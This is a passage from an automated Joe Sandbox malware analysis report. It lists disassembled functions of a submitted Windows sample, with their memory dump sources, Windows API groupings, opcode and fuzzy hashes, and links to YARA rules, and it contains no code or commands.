                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindFreeLoadLockSizeof
                                                                            • String ID: PNG
                                                                            • API String ID: 4159136517-364855578
                                                                            • Opcode ID: 93687c374e59481319c4d3ae486b02e7e8b752067a7dd1e921a65743edc8cba9
                                                                            • Instruction ID: fd5692a81e7f87f205bba697d3c57e12020dc1d712e930020d9b0d5ec86d86e7
                                                                            • Opcode Fuzzy Hash: 93687c374e59481319c4d3ae486b02e7e8b752067a7dd1e921a65743edc8cba9
                                                                            • Instruction Fuzzy Hash: DF11A175305B4086EE06EB5369487AA67E1BB4DFD0F084434EF8907BB5EE7CC5468300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401FFFF8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                            • String ID: CONOUT$
                                                                            • API String ID: 3230265001-3130406586
                                                                            • Opcode ID: 2f5238129b615f644adfdc61cd7a0e4d1c110de89ebae83789b6dfdc0860481f
                                                                            • Instruction ID: 88b7969f582a8c7da5aad9a5b9531abdc1a509b790e7d8ec06eb0b7ec04453ee
                                                                            • Opcode Fuzzy Hash: 2f5238129b615f644adfdc61cd7a0e4d1c110de89ebae83789b6dfdc0860481f
                                                                            • Instruction Fuzzy Hash: ED119036320B8086F7519B13E858B9A66E2F79CFE4F404224EB59877F4DFB8C8448744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401642E0 Relevance: 9.5, APIs: 6, Instructions: 465COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID:
                                                                            • API String ID: 2353593579-0
                                                                            • Opcode ID: bd3f8361b8f9c3397e7172e64279efe113b9ed40e89afb2693c79ee536329348
                                                                            • Instruction ID: a75c32f7a963d666105cf5cda93370da7dea597e2cfd0f43f5939c7c061f6715
                                                                            • Opcode Fuzzy Hash: bd3f8361b8f9c3397e7172e64279efe113b9ed40e89afb2693c79ee536329348
                                                                            • Instruction Fuzzy Hash: 45026736314A9182EA16EBA7E8543ED23A5BB8DFD4F484926DF0E577A2DF38C441C304
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140138050 Relevance: 9.4, APIs: 6, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Inflate$Empty
                                                                            • String ID:
                                                                            • API String ID: 4171175343-0
                                                                            • Opcode ID: 5e0fd01b6b72547656a93d7d57fb1b6f291c04047efe1ad6c595313973f6f440
                                                                            • Instruction ID: 89b8381cf305f60904c9c20727b8590814f8b2ee730f8d17144c794297ec0216
                                                                            • Opcode Fuzzy Hash: 5e0fd01b6b72547656a93d7d57fb1b6f291c04047efe1ad6c595313973f6f440
                                                                            • Instruction Fuzzy Hash: F2F15C72A04B848AFB62DFA6D444BED33A1F74CB88F154229EF4997BA5DB34C445C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400A6530 Relevance: 9.3, APIs: 6, Instructions: 296windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDestroyParent$CopyExceptionIconRedrawThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 3506574077-0
                                                                            • Opcode ID: 66932146c9bcaa270c68ee22a56249e68f246334e80308474ed53cdf21c3bb25
                                                                            • Instruction ID: 18886d3435660d26a6b580c184176ab9efb47b3b4c27c6951c70a94ff953b865
                                                                            • Opcode Fuzzy Hash: 66932146c9bcaa270c68ee22a56249e68f246334e80308474ed53cdf21c3bb25
                                                                            • Instruction Fuzzy Hash: A1C1BE35701A4182EB5ADB27E5983ED2371FB9CBC4F184226EB194B7B5DF78C4928B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401FC0CC Relevance: 9.2, APIs: 6, Instructions: 223COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3215553584-0
                                                                            • Opcode ID: 8f71e8f78ce42dfa13f8ae3b3d6ce8de3eb54376600b7248d849b8755048b882
                                                                            • Instruction ID: c7d56def2553da81f5fc827971cbd67b98ee5046f83e9ce0986deff8743221f9
                                                                            • Opcode Fuzzy Hash: 8f71e8f78ce42dfa13f8ae3b3d6ce8de3eb54376600b7248d849b8755048b882
                                                                            • Instruction Fuzzy Hash: 7291E4727256D085FB22DB22D6603ED76A4BB68FE4F188219DF6547BE5DB34C842E300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140092564 Relevance: 9.2, APIs: 6, Instructions: 166windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$EmptyParentRectRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 3879113052-0
                                                                            • Opcode ID: c2f11528365bc0e702ac84aeeef73be496c3e8d064ed229e3c2cc5eb29e22396
                                                                            • Instruction ID: e4e9a459d3df3f4822e0ff4f50f5573a34efb806104c9f3ef630835967af2b5e
                                                                            • Opcode Fuzzy Hash: c2f11528365bc0e702ac84aeeef73be496c3e8d064ed229e3c2cc5eb29e22396
                                                                            • Instruction Fuzzy Hash: E6617936710A508AEB15DFA7D450BED67A1FB8CB88F054026EF0E57BA4DE79D442C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014014C57C Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 839f492d6d34be0e97546e08670404adf7f165091affd25df6efa605ed8995da
                                                                            • Instruction ID: 87e446806d77016ca0573bf57eee48dabd9c597938ba2b99769cdf82cbe8bf2e
                                                                            • Opcode Fuzzy Hash: 839f492d6d34be0e97546e08670404adf7f165091affd25df6efa605ed8995da
                                                                            • Instruction Fuzzy Hash: 1A516C76210A8092EB568F27E8547DA6321F788FD4F169222EF5D0BBB8DE34C502C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140076674 Relevance: 9.1, APIs: 6, Instructions: 135windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientMessageScreenSendWindow
                                                                            • String ID:
                                                                            • API String ID: 2093367132-0
                                                                            • Opcode ID: e7d5d7832fce23f00eeb5f21d1acf8394db4bff88555591e5572bfbc5ed895d9
                                                                            • Instruction ID: 2bbcd081a791a5380f7d53db871c380c63968c99e8fb4d7ecbb8cdbc9e50c91f
                                                                            • Opcode Fuzzy Hash: e7d5d7832fce23f00eeb5f21d1acf8394db4bff88555591e5572bfbc5ed895d9
                                                                            • Instruction Fuzzy Hash: 84513D75A0860081FBAABB33D4843EE26A0F78CBC4F540426FB47876F5DA7DC890CA41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140086298 Relevance: 9.1, APIs: 6, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ConditionMaskWindow$BackgroundClientDrawFillInfoMetricsParentPointsSystemThemeVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 3218022401-0
                                                                            • Opcode ID: 3b25bf4e41cef08f91dce310206dc6ea695ab5483460a4003c1d595307dba382
                                                                            • Instruction ID: 19f4eb0740e7b7fcbb170bad8778599c69f22006de7534927e7437aeee62f64d
                                                                            • Opcode Fuzzy Hash: 3b25bf4e41cef08f91dce310206dc6ea695ab5483460a4003c1d595307dba382
                                                                            • Instruction Fuzzy Hash: B851AE36605A8086EB16DF23E854BAE67A0FB8CBC4F059021FF4A47BA0EF78C541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014003E540 Relevance: 9.1, APIs: 6, Instructions: 121windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Text$ItemLengthLong
                                                                            • String ID:
                                                                            • API String ID: 538016872-0
                                                                            • Opcode ID: 12e4cd8df65f45c7c7f48a9676cbd89acf03eff6fbe613e40f7bac8e025f4fae
                                                                            • Instruction ID: 30bfd975ea69eb28d482e1de3ff25fae77e5e7990cf4177de3eff9bceadb3cd0
                                                                            • Opcode Fuzzy Hash: 12e4cd8df65f45c7c7f48a9676cbd89acf03eff6fbe613e40f7bac8e025f4fae
                                                                            • Instruction Fuzzy Hash: 34517936714A8082EB229F27E5857AF7761E78CBE4F148221FB69477E6CF38C8518740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014009A198 Relevance: 9.1, APIs: 6, Instructions: 119windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$FocusMessageSendUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 2438739141-0
                                                                            • Opcode ID: 4f1bd0ed8293b001d60c75b72ce99f6271484644d00ddc34160ed3d623aa0448
                                                                            • Instruction ID: 5306266ed95f3a3d8e8877018fc3e3ca4a2c538d002a2e258a5ca4b5a55ba708
                                                                            • Opcode Fuzzy Hash: 4f1bd0ed8293b001d60c75b72ce99f6271484644d00ddc34160ed3d623aa0448
                                                                            • Instruction Fuzzy Hash: 5C51AC35205B8182FE26EB67E4943EA23A0AB8DBE0F184125FB9A477F5DE7DC4418340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140152730 Relevance: 9.1, APIs: 6, Instructions: 86windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$Enable$CheckCountState
                                                                            • String ID:
                                                                            • API String ID: 1442426176-0
                                                                            • Opcode ID: 9190c680a120d7d633a922c8599e2881aa82430fe02b2aa40675fdb0d0433749
                                                                            • Instruction ID: a2ae7b46029b9a60efb080a5cb77d337e45087f66b4751f84b97240e93c1710e
                                                                            • Opcode Fuzzy Hash: 9190c680a120d7d633a922c8599e2881aa82430fe02b2aa40675fdb0d0433749
                                                                            • Instruction Fuzzy Hash: 1631A23A700B4081E756AB63D45939A2BA1FB8DFD0F184525DF994B7F5DF79C4428700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400604CC Relevance: 9.1, APIs: 6, Instructions: 83keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendState$ItemNextParent
                                                                            • String ID:
                                                                            • API String ID: 1930099164-0
                                                                            • Opcode ID: eb810cc5d1583be9c866a6dd4ff852e74709a8fc01d94d6a5bb29f331829081d
                                                                            • Instruction ID: ca0237629af525c576eebf6b92c50bbe9943adab76d20fb6cd65c4df9ed60a3c
                                                                            • Opcode Fuzzy Hash: eb810cc5d1583be9c866a6dd4ff852e74709a8fc01d94d6a5bb29f331829081d
                                                                            • Instruction Fuzzy Hash: 9C316F35281A4282FE669B17E8547EB2362EB8CBD4F140525EB5F0B7F0EF78C4418A40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400660C8 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ContextExternal$BaseBase::~Concurrency::details::
                                                                            • String ID:
                                                                            • API String ID: 90368001-0
                                                                            • Opcode ID: f1a0382aba91b18763cfa8e740c47a32856f2fed497b1c64dafc1082f5532dc2
                                                                            • Instruction ID: c726d73ec35fa7949b87bd4cf0595aa691b8a3394e52e36824e497b838406b5e
                                                                            • Opcode Fuzzy Hash: f1a0382aba91b18763cfa8e740c47a32856f2fed497b1c64dafc1082f5532dc2
                                                                            • Instruction Fuzzy Hash: 83319E36224AC093EB669B22E855BDA7760FBCDB90F404225EB9D47BA5DF78C514CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013A6CC Relevance: 9.1, APIs: 6, Instructions: 54windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
